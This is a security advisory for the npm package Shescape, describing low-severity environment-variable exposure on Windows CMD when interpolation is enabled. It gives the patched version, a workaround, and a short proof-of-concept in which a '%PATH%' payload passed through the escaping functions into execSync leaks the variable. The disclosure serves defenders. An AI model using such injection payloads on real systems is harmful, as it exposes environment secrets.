GHSA-3g7p-8qhx-mc8r

Suggest an improvement
Source
https://github.com/advisories/GHSA-3g7p-8qhx-mc8r
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/06/GHSA-3g7p-8qhx-mc8r/GHSA-3g7p-8qhx-mc8r.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-3g7p-8qhx-mc8r
Aliases
Published
2023-06-22T20:01:39Z
Modified
2023-11-08T04:12:54.534872Z
Severity
  • 3.1 (Low) CVSS_V3 - CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N CVSS Calculator
Summary
Shescape potential environment variable exposure on Windows with CMD
Details

Impact

This impact users of Shescape:

  1. On Windows using the Windows Command Prompt (i.e. cmd.exe), and
  2. Using quote/quoteAll or escape/escapeAll with the interpolation option set to true.

An attacker may be able to get read-only access to environment variables. Example:

import * as cp from "node:child_process";
import * as shescape from "shescape";

// 1. Prerequisites
const options = {
    shell: "cmd.exe",
    // Or
    shell: undefined, // Only if the default shell is CMD

    // And
    interpolation: true, // Only applies to `escape` and `escapeAll` usage
}

// 2. Attack (one of many)
const payload = "%PATH%";

// 3. Usage
let escapedPayload;

escapedPayload = shescape.quote(payload, options);
// Or
escapedPayload = shescape.quoteAll([payload], options);
// Or
escapedPayload = shescape.escape(payload, options);
// Or
escapedPayload = shescape.escapeAll([payload], options);

// And (example)
const result = cp.execSync(`echo Hello ${escapedPayload}`, options);

// 4. Impact
console.log(result.toString());
// Outputs "Hello" followed by the contents of the PATH environment variable

Patches

This bug has been patched in v1.7.1 which you can upgrade to now. No further changes are required.

Workarounds

Alternatively, users can remove all instances of % from user input, either before or after using Shescape.

References

References

Affected packages

npm / shescape

Package

Affected ranges

Type
SEMVER
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
1.7.1